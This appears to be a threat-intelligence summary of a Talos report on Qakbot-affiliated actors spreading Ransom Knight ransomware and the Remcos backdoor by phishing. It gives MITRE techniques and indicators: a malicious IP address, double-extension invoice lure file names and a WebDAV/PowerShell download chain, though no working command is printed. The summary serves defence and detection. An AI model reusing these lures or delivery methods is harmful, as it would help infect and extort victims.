Talos reports that Qakbot-affiliated actors have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails since early August 2023, continuing despite the FBI’s late August 2023 infrastructure seizure. The operation suggests the developers remain active and may rebuild Qakbot infrastructure, with a new campaign using LNK-based downloaders and PowerShell to pull payloads from a remote host. #Qakbot #RansomKnight #Remcos #Cyclops #LNK #XLL
Keypoints
- The Qakbot threat actors are distributing a variant of Cyclops/Ransom Knight ransomware along with the Remcos backdoor via phishing emails, starting before the FBI takedown in August 2023.
- The FBI operation seized Qakbot infrastructure and cryptocurrency assets, but Talos notes the campaign evidence suggests the spam delivery infrastructure may have persisted while C2 access was disrupted.
- Metadata in LNK files from the August 2023 campaign matches machines used in earlier Qakbot campaigns (AA and BB), indicating affiliates are driving the new activity.
- Despite the takedown, the threat actors appear active and may rebuild Qakbot infrastructure; law enforcement did not arrest the operators, sustaining risk.
- The LNKs point to a network share via WebDAV to download the next stage (89.23.96.203) and use PowerShell to fetch a payload, illustrating T1105 and PowerShell-based download chains.
- Phishing emails feature Italian-language file names and ZIP archives containing an LNK and an XLL (Remcos backdoor), with the LNK loading the Ransom Knight payload from the remote host.
MITRE Techniques
- [T1566.001] Phishing – Spearphishing via attachment, used to deliver LNK/XLL payloads in ZIP archives within phishing emails. “The filenames of these LNK files, with themes of urgent financial matters, suggest they are being distributed in phishing emails…”
- [T1204.002] User Execution: Malicious File – Execution triggered by opening/interaction with LNK files distributed inside ZIP archives. “The filenames of these LNK files… are being distributed inside Zip archives that also contain an XLL file.”
- [T1059.001] PowerShell – PowerShell is used to download and execute the next stage of the payload. “The payload … pointed to PowerShell.exe and pass the following arguments to download the next stage: …”
- [T1105] Ingress Tool Transfer – Downloading of a remote executable via WebDAV from a remote IP. “This method could be an attempt to bypass command line detection for downloading of a remote executable via PowerShell (T1105 Ingress Tool Transfer).”
Indicators of Compromise
- [IP Address] 89.23.96.203 – used in WebDAV-based download of the next-stage payload; associated with the LNK download chain
- [File Name] ATTENTION-Invoice-29-August.docx.lnk, NOT-paid-Invoice-26-August.pdf.lnk – LNK/Zip phishing attachments used to lure users
- [File Name] information.exe – next-stage payload downloaded from the remote host
- [File] Remcos backdoor XLL file – XLL inside ZIP, delivering Remcos alongside Ransom Knight
Read more: https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/